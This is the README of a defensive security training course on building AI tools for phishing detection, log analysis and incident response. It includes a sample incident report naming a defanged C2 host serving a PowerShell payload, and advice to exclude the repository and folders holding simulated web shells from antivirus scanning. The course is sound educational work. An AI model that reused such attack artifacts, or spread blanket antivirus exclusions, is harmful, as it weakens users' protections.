-blue.svg){kind=icon}
A hands-on training program for security practitioners who want to build AI-powered tools for threat detection, incident response, and security automation. 50+ labs (including 9 intro labs and 12 bridge labs), 4 capstone projects, 18 CTF challenges. Includes sample datasets, solution walkthroughs, and Docker lab environment. Designed for vibe coding with AI assistants like Cursor, Claude Code, and Copilot.
Lab 10 - Phishing Classifier catches what rules miss:
$ python labs/lab10-phishing-classifier/solution/main.py
[+] Training on 1,000 labeled emails...
[+] Model: Random Forest + TF-IDF (847 features)
[+] Accuracy: 96.2% | Precision: 94.1% | Recall: 97.8%
Scanning inbox (4 new emails)...
From: [email protected]
Subj: "Your account will be suspended in 24 hours"
--> PHISHING (98.2%) [urgency + spoofed domain]
From: [email protected]
Subj: "Q3 budget report attached"
--> LEGIT (94.6%)
From: [email protected]
Subj: "Click here to verify your identity"
--> PHISHING (96.7%) [link mismatch + typosquat]
From: [email protected]
Subj: "Password expires in 7 days - reset here"
--> SUSPICIOUS (67.3%) [needs review]
Top features that caught phishing:
urgency_words: +0.34 (suspend, verify, immediately)
url_mismatch: +0.28 (display != actual link)
domain_spoof: +0.22 (amaz0n, paypa1)
Lab 35 - LLM Log Analysis finds attacks in noise:
+------------------------------------------------------+
| Lab 35: LLM-Powered Security Log Analysis - SOLUTION |
+------------------------------------------------------+
Security Log Analysis Pipeline
Step 1: Initializing LLM...
LLM initialized: READY
Step 2: Parsing log entries...
Parsing entry 1/5... Done
Parsing entry 2/5... Done
Parsing entry 3/5... Done
Parsing entry 4/5... Done
Parsing entry 5/5... Done
Parsed 5 log entries
Step 3: Analyzing for threats...
Found 2 threats
Severity: 8/10
Step 4: Extracting IOCs...
Extracted 12 IOCs
Step 5: Generating incident report...
Report generated
================================================================
INCIDENT REPORT
================================================================
+--------------------------------------------------------------+
| Executive Summary |
+--------------------------------------------------------------+
A critical security incident involving multi-stage attack behavior
was detected on WORKSTATION01 involving user 'jsmith'. The attack
progression includes initial PowerShell execution downloading a
payload from a suspicious external domain, followed by system
discovery commands, and culminating in persistence establishment
via Registry Run keys and Scheduled Tasks.
+--------------------------------------------------------------+
| Timeline |
+--------------------------------------------------------------+
1 2025-01-15 03:22:10 - PowerShell downloaded payload from
hxxp://evil-c2[.]com/payload.ps1
2 2025-01-15 03:22:15 - Discovery commands executed
(whoami, hostname, ipconfig)
3 2025-01-15 03:22:18 - Network connection to evil-c2[.]com
(185[.]143[.]223[.]47:443)
4 2025-01-15 03:23:00 - Registry persistence: HKCU Run keys
5 2025-01-15 03:25:00 - Scheduled Task: SecurityUpdate created
+--------------------------------------------------------------+
| MITRE ATT&CK Mapping |
+--------------------------------------------------------------+
Technique ID Technique Name Evidence
-------------------------------------------------------------
T1059.001 PowerShell DownloadString, IEX
T1082 System Information Discovery whoami, hostname
T1547.001 Registry Run Keys HKCU\...\Run
T1053.005 Scheduled Task SecurityUpdate
T1105 Ingress Tool Transfer DownloadString
+--------------------------------------------------------------+
| Attribution Analysis |
+--------------------------------------------------------------+
High Confidence: FIN7/Carbanak
* Tooling matches known campaigns (PowerShell obfuscation)
* Infrastructure historically associated with FIN7
* TTP sequence is signature behavior pattern
No installation needed -- click and run in your browser:
Beginner (No API key):
Prompt Engineering basics
Your first ML model
Intermediate (No API key):
ML phishing detection
Advanced (API key required):
LLM-powered log analysis
All 50+ notebooks are in
notebooks/-- open any.ipynbin Colab
| Your Background | Start Here | Next Steps |
|---|---|---|
| Completely new to AI? | Lab 02: Prompt Engineering | -> Lab 07 -> Lab 10 |
| New to AI/ML? | Lab 10: Phishing Classifier | -> Lab 11 -> Lab 12 |
| Know Python, want LLM tools? | Lab 15: LLM Log Analysis | -> Lab 16 -> Lab 18 |
| Want DFIR focus? | Lab 31: Ransomware Detection | -> Lab 33 -> Lab 34 |
Tip: Labs 00-13 are FREE (no API keys). LLM labs (14+) need an API key (~$5-25 total).
Click any lab to explore -- Your learning journey from setup to expert:
Legend: Grey Foundation (00-09, Free) | Green ML Foundations (10-13, Free) | Purple LLM Basics (14-18) | Orange Detection/DFIR (19-29) | Red Advanced/Cloud (30-50)
Detailed Lab Descriptions
| Lab | Topic | Description |
|---|---|---|
| 00 | Setup | Environment configuration |
| 01 | Python | Security-focused Python basics |
| 02 | Prompts | LLM basics with free playgrounds |
| 03 | Vibe Coding | AI assistants for accelerated learning |
| 04 | ML Intro | Supervised/unsupervised, features, evaluation |
| 05 | AI in SOC | Where AI fits, human-in-the-loop |
| 06 | Stats | Matplotlib, Seaborn for dashboards |
| 07 | Hello ML | Your first ML model end-to-end |
| 08 | APIs | REST APIs, authentication, rate limiting |
| 09 | CTF Fundamentals | CTF mindset, encoding, flag hunting |
| Lab | Topic | Description |
|---|---|---|
| 10 | Phishing | TF-IDF, Random Forest, classification |
| 11 | Malware | K-Means, DBSCAN, clustering binaries |
| 12 | Anomaly | Isolation Forest, LOF, baselines |
| 13 | ML vs LLM | When to use each, cost tradeoffs |
| Lab | Topic | Description |
|---|---|---|
| 14 | Agent | ReAct pattern, tool calling basics |
| 15 | Logs | Prompt engineering, IOC extraction |
| 16 | Intel | LangChain, autonomous investigation |
| 17 | Vectors | Embeddings, similarity search |
| 18 | RAG | ChromaDB, retrieval-augmented Q&A |
| Lab | Topic | Description |
|---|---|---|
| 19 | Binary | PE structure, entropy analysis |
| 20 | Sigma | Log-based detection rules |
| 21 | YARA | AI-assisted rule generation |
| 22 | Vuln | CVSS, risk prioritization |
| 23 | Pipeline | ML filtering + LLM enrichment |
| 24 | Monitor | Observability, cost tracking |
| 25 | DFIR | Forensics basics, evidence collection |
| 26 | Windows Logs | Event log parsing, detection |
| 27 | Registry | Registry forensics, persistence |
| 28 | Live IR | Live response, triage procedures |
| 29 | IR Bot | Conversational IR, playbook execution |
| 30 | Ransom Fund | Ransomware families, attack lifecycle |
| 31 | Ransom | Entropy, behavioral detection |
| 32 | Purple | Safe adversary emulation |
| 33 | Memory | Volatility3, process injection |
| 34 | C2 | Beaconing, DNS tunneling, JA3 |
| 35 | Lateral | Auth anomalies, graph paths |
| Lab | Topic | Description |
|---|---|---|
| 36 | Actors | TTP extraction, attribution |
| 37 | AI Threat | Deepfakes, AI-generated phishing |
| 38 | MLSec | Data poisoning, model security |
| 39 | Adv ML | Evasion attacks, robust defenses |
| 40 | LLM Security | Prompt injection testing, jailbreaks |
| 41 | Model Monitor | Drift detection, adversarial inputs |
| 42 | Tuning | LoRA, custom embeddings |
| 43 | RAG Security | KB poisoning, context sanitization |
| 44 | Cloud Fund | Shared responsibility, IAM |
| 45 | Cloud | AWS/Azure/GCP, CloudTrail |
| 46 | Container | Kubernetes, runtime detection |
| 47 | Serverless | Lambda, event injection |
| 48 | Cloud IR | Automated containment, evidence |
| 49 | Red Team | Prompt injection, jailbreaks |
| 50 | Purple AI | Automated attack simulation |
| Project | Difficulty | Focus |
|---|---|---|
| Security Analyst Copilot | Advanced | LLM agents, IR automation |
| Automated Threat Hunter | Advanced | ML detection, pipelines |
| Malware Analysis Assistant | Intermediate | Static analysis, YARA |
| Vulnerability Intel Platform | Intermediate | RAG, prioritization |
Each includes starter code, requirements, and evaluation criteria. See capstone-projects/.
| Requirement | Minimum | Recommended |
|---|---|---|
| Python | 3.10 | 3.10-3.12 (PyTorch not yet available for 3.13+) |
| RAM | 8GB | 16GB (for local LLMs) |
| OS | Windows, macOS, Linux | Any |
| Editor | Any | VS Code, Cursor, PyCharm |
| Git | Required | - |
| Docker | Optional | For containerized labs |
| API Key | Labs 14+ only | Free tiers available |
git clone https://github.com/depalmar/ai_for_the_win.git
cd ai_for_the_win/docker
# Start Jupyter only (fastest — enough for most labs)
docker compose up -d jupyter
# Or start everything (requires 8GB+ RAM)
docker compose up -d
# Access Jupyter Lab: http://localhost:8888 (token: aiforthewin)Available services: Jupyter Lab, Elasticsearch, Kibana, PostgreSQL, Redis, MinIO, Ollama (local LLMs), ChromaDB (vectors). Start only what you need — see docker/README.md for service profiles.
Python 3.10, 3.11, or 3.12 required. Python 3.13 is experimental. Python 3.14 is not supported — it causes
resolution-too-deeperrors because PyTorch, LangChain, and other packages lack 3.14 wheels. Check withpython --versionbefore proceeding.
# 1. Clone the repository
git clone https://github.com/depalmar/ai_for_the_win.git
cd ai_for_the_win
# 2. Create virtual environment (use python3.12 if you have multiple versions)
python -m venv venv
source venv/bin/activate # Windows: .\venv\Scripts\activate
# 3. Install dependencies (pick ONE)
pip install -r requirements.txt # Everything (all providers)
pip install -e ".[anthropic]" # Core + Claude (recommended)
pip install -e ".[ollama]" # Core + Ollama (free, local)
pip install -e "." # Core only (Labs 00-13, no LLM)
# 4. Verify setup
python scripts/verify_setup.py
# 5. Start with Lab 00 (no API key needed)
cd labs/lab00-environment-setupDependency install failing?
If pip install hangs or fails with resolution-too-deep:
- Check Python version — must be 3.10-3.12 (
python --version) - Try
uv(faster resolver):pip install uv && uv pip install -r requirements.txt - Install selectively:
pip install -e ".[anthropic]"instead of the fullrequirements.txt
See Troubleshooting Guide for details.
# Copy example env
cp .env.example .env
# Edit .env with your preferred editor and add API key
# IMPORTANT: Don't paste keys in terminal (saved in history)
# Example: ANTHROPIC_API_KEY=your-key-here
# Verify setup
python scripts/verify_setup.py| Variable | Description | Required |
|---|---|---|
ANTHROPIC_API_KEY |
Claude API | One LLM key required |
OPENAI_API_KEY |
GPT-4/5 API | One LLM key required |
GOOGLE_API_KEY |
Gemini API | One LLM key required |
VIRUSTOTAL_API_KEY |
VirusTotal | Optional |
You only need ONE LLM provider. All labs support multiple providers.
pytest tests/ -v # All tests
pytest tests/test_lab01*.py -v # Single lab
pytest tests/ --cov=labs # With coverage
docker compose run test # In Docker| Resource | Description |
|---|---|
| Environment Setup | First-time setup |
| API Keys Guide | Get API keys, manage costs |
| Troubleshooting | Fix common issues |
| Lab Walkthroughs | Step-by-step solutions |
| Role-Based Paths | SOC, IR, hunting paths |
| Security-to-AI Glossary | AI terms for security folks |
| All Guides | 28 guides: tools, APIs, advanced |
Issues? Open a GitHub issue
| Category | Tools |
|---|---|
| LLM Providers | Claude (Sonnet/Opus/Haiku), GPT-5, Gemini 3, Ollama |
| LLM Frameworks | LangChain, LangGraph, LiteLLM |
| ML/AI | scikit-learn, PyTorch, Transformers |
| Vector DB | ChromaDB, sentence-transformers |
| Security | YARA, Sigma, MITRE ATT&CK, pefile |
| Vibe Coding | Cursor, Claude Code, Copilot, Windsurf |
Created by Raymond DePalma
Contributions welcome! Please read CONTRIBUTING.md first.
AI for the Win is dual-licensed for maximum flexibility:
| Content Type | License | Personal Use | Commercial Use |
|---|---|---|---|
| Educational content, labs, docs | CC BY-NC-SA 4.0 | ✅ FREE | Requires license |
| Code samples and scripts | MIT | ✅ FREE | ✅ FREE |
- Individual learning and skill development
- Academic coursework (as a student)
- Personal portfolio projects
- Contributing back to this project
Need a license for:
- Corporate training programs (internal employee training)
- Bootcamps & courses (paid training programs)
- Consulting engagements using materials
- Universities (formal curricula - FREE with attribution)
View Commercial Licensing Options | Contact Raymond DePalma
"AI for the Win" is a trademark of Raymond DePalma. You may reference this project by name with attribution, but may not use it in competing training programs or in ways that suggest official affiliation.
See LICENSE for complete terms.
Some labs and CTF challenges include sample malware metadata, IOC patterns, or simulated attack artifacts that may trigger antivirus software. These files contain analysis data for educational purposes, not actual malware.
Paths to exclude in your antivirus software:
ai_for_the_win/- The entire repository (recommended)ctf-challenges/**/challenge/- CTF challenge files with simulated web shells, persistence mechanismslabs/lab21-yara-generator/data/- Malware metadata for YARA rule generationdata/malware/- Sample malware analysis artifacts
Add folder exclusions for these paths in your AV settings if files are being quarantined.
This project aims to be accessible to all learners:
- Lab difficulty indicators use both color AND text labels (e.g., "Beginner")
- All code examples include descriptive comments
- Documentation uses high-contrast text
If you encounter accessibility issues, please open an issue.
Responsible Use: This material is for defensive security education only. Do not use techniques described here for unauthorized access or attacks. See RESPONSIBLE_USE.md.
This is a personal educational project created and maintained on personal time. It is not affiliated with, endorsed by, or sponsored by any employer, organization, or vendor.
Ready to build AI-powered security tools?
Start in Colab |
Local Setup |
Full Curriculum